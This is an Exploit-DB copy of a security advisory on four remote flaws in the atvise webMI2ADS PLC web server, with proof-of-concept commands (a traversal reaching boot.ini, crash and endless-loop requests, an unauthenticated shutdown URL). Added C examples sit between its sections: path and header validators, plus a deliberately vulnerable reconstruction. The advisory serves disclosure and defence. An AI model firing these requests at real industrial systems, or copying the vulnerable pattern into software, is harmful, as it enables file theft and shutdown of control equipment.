exploit-db-mirror/exploits/windows/dos/17963.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25
1979 changes to exploits/shellcodes

2018-09-25 05:01:51 +00:00


#######################################################################
Luigi Auriemma
Application: atvise webMI2ADS - Web server for Beckhoff PLCs
http://www.atvise.com/en/atvise-downloads/products
Versions: <= 1.0
Platforms: Windows XP embedded and CE x86/ARM
Bugs: A] directory traversal
B] NULL pointer
C] termination of the software
D] resources consumption
Exploitation: remote
Date: 10 Oct 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From the vendor's website:
"webMI2ADS is a very slim and compact web server with an ADS interface
(Beckhoff native PLC interface). It can be integrated on nearly any
ethernet based Beckhoff PLC and provides full data access including
automatic import of all PLC variables and types."
#######################################################################
=======
2) Bugs
=======
----------------------
A] directory traversal
----------------------
Classic directory traversal through the backslash delimiter, which
allows reading the files located on the disk where the server is
running.
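A defender-side check for the traversal pattern in A]: this is an added example, not part of the advisory or the vendor's code, and it assumes a server that maps the request path under a document root on Windows, where both '\' and '/' are accepted as separators and "%5c" decodes to a backslash.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decodes src into dst (dst needs strlen(src)+1 bytes). Rejects
 * malformed escapes and %00, so an encoded "%5c" is always seen as '\'. */
static bool percent_decode(const char *src, char *dst)
{
    for (; *src; src++) {
        if (*src != '%') { *dst++ = *src; continue; }
        if (!isxdigit((unsigned char)src[1]) || !isxdigit((unsigned char)src[2]))
            return false;
        char hex[3] = { src[1], src[2], '\0' };
        long v = strtol(hex, NULL, 16);
        if (v == 0)                            /* embedded NUL */
            return false;
        *dst++ = (char)v;
        src += 2;                              /* loop's src++ skips the third char */
    }
    *dst = '\0';
    return true;
}

/* Decodes raw_path into out and returns true only if it is a rooted path
 * whose segments never contain "..", under either separator. Backslashes
 * are normalised to '/' first because the Windows file API accepts both,
 * which is what lets the "..\" form in bug A] escape the document root. */
bool is_safe_request_path(const char *raw_path, char *out, size_t outlen)
{
    if (raw_path == NULL || strlen(raw_path) + 1 > outlen)
        return false;
    if (!percent_decode(raw_path, out) || out[0] != '/' || strchr(out, ':'))
        return false;
    for (char *p = out; *p; p++)
        if (*p == '\\')
            *p = '/';
    for (const char *seg = out; *seg; ) {
        size_t len = strcspn(seg, "/");
        if (len == 2 && seg[0] == '.' && seg[1] == '.')
            return false;
        seg += len + (seg[len] == '/');
    }
    return true;
}
```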
---------------
B] NULL pointer
---------------
NULL pointer dereference caused by the lack of a check on the value
returned by strchr when parsing the Authorization: Basic HTTP header:
0043094F |> 6A 06 PUSH 6 ; /maxlen = 6
00430951 |. 68 7CAB4400 PUSH webMI2AD.0044AB7C ; |s2 = "Basic "
00430956 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
00430959 |. 50 PUSH EAX ; |s1
0043095A |. FF15 10044400 CALL DWORD PTR DS:[<&MSVCR90._strnicmp>] ; \_strnicmp
...skip...
004309BC |. 6A 3A PUSH 3A ; /c = 3A (':')
004309BE |. 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108] ; |
004309C4 |. 51 PUSH ECX ; |s
004309C5 |. FF15 FC034400 CALL DWORD PTR DS:[<&MSVCR90.strchr>] ; \strchr
004309CB |. 83C4 08 ADD ESP,8
004309CE |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
004309D1 |. 837D FC 00 CMP DWORD PTR SS:[EBP-4],0
004309D5 |. 74 4B JE SHORT webMI2AD.00430A22
004309D7 |. 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]
004309DA |. 2B55 FC SUB EDX,DWORD PTR SS:[EBP-4]
004309DD |. 83FA 40 CMP EDX,40
004309E0 |. 7D 40 JGE SHORT webMI2AD.00430A22
004309E2 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
004309E5 |. C600 00 MOV BYTE PTR DS:[EAX],0
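The pattern above, reconstructed in C beside a hardened version: this is an added example, not the vendor's source, so the vulnerable function is an assumption drawn from the disassembly (the 0x40 bound and the unchecked strchr result), and for brevity the text after "Basic " is treated as already base64-decoded "user:pass".

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
#include <strings.h>

#define CRED_MAX 0x40  /* the 64-byte bound the disassembly compares against (CMP EDX,40) */

/* Reconstruction of the vulnerable pattern (an assumption drawn from the
 * disassembly, not the vendor's source): strchr's result is compared and
 * then written through without ever being tested for NULL, so a value with
 * no ':' in it makes the final store hit address 0. Never call this. */
void vulnerable_split(char *decoded)
{
    char *colon = strchr(decoded, ':');   /* NULL when there is no ':' */
    if (colon - decoded >= CRED_MAX)      /* only the distance is checked */
        return;
    *colon = '\0';                        /* NULL pointer write */
}

/* Hardened parser: case-insensitive "Basic " prefix check (what _strnicmp
 * does), then the credentials are split only after confirming that strchr
 * found a ':' and that the user name fits the bound. The text after
 * "Basic " is treated as already base64-decoded "user:pass" (simplification).
 * Returns true and fills user/pass on success, false on malformed input. */
bool parse_basic_authorization(const char *header, char *user, size_t ulen,
                               const char **pass)
{
    if (header == NULL || user == NULL || ulen == 0 || pass == NULL)
        return false;
    if (strncasecmp(header, "Basic ", 6) != 0)
        return false;
    const char *decoded = header + 6;
    const char *colon = strchr(decoded, ':');
    if (colon == NULL)                    /* the check the original lacks */
        return false;
    size_t name_len = (size_t)(colon - decoded);
    if (name_len == 0 || name_len >= CRED_MAX || name_len >= ulen)
        return false;
    memcpy(user, decoded, name_len);
    user[name_len] = '\0';
    *pass = colon + 1;
    return true;
}
```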
------------------------------
C] termination of the software
------------------------------
To terminate the software remotely it is enough to request the
/shutdown webpage.
------------------------
D] resources consumption
------------------------
Endless loop with memory consumption and CPU at 100% caused by a
particular negative Content-Length value.
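A validating Content-Length parser for the class of input in D]: this is an added example, not the vendor's code, and the 16 MiB policy limit and the "\r\n"-separated request head it scans (the shape of the PoC request) are assumptions of the example.

```c
#include <ctype.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#define MAX_BODY_BYTES (16UL * 1024 * 1024)  /* policy limit chosen for this example */

/* Validates a Content-Length value: -1 for absent, signed ("-30" is rejected
 * before any arithmetic), non-numeric, trailing junk, overflow, or above the
 * policy limit; otherwise the length. A negative value that reaches size
 * arithmetic or a read loop as an unsigned count is the kind of input bug D
 * describes. */
long parse_content_length(const char *value)
{
    if (value == NULL) return -1;
    while (*value == ' ' || *value == '\t')   /* optional leading whitespace */
        value++;
    if (!isdigit((unsigned char)*value))      /* rejects "", "-30", "+1" */
        return -1;
    errno = 0;
    char *end;
    unsigned long long n = strtoull(value, &end, 10);
    if (errno == ERANGE) return -1;
    while (*end == ' ' || *end == '\t')       /* optional trailing whitespace */
        end++;
    return (*end == '\0' && n <= MAX_BODY_BYTES) ? (long)n : -1;
}

/* Finds Content-Length in a raw "\r\n"-separated request head (the shape of
 * the advisory's PoC request): validated length, 0 if absent, -1 if invalid. */
long request_content_length(const char *head)
{
    const char *p = head;
    while ((p = strstr(p, "\r\n")) != NULL) {
        p += 2;
        if (strncasecmp(p, "Content-Length:", 15) != 0)
            continue;
        const char *v = p + 15;
        const char *eol = strstr(v, "\r\n");
        size_t len = eol ? (size_t)(eol - v) : strlen(v);
        char buf[32];
        if (len >= sizeof buf) return -1;
        memcpy(buf, v, len);
        buf[len] = '\0';
        return parse_content_length(buf);
    }
    return 0;
}
```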
#######################################################################
===========
3) The Code
===========
http://aluigi.org/mytoolz/mydown.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17963-1.zip
http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17963-2.zip
A]
mydown http://SERVER/..\..\..\..\..\..\..\boot.ini
mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
B]
udpsz -c "GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n" -T -D SERVER 80 -1
C]
http://SERVER/shutdown
D]
udpsz -c "POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n" -T -D SERVER 80 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################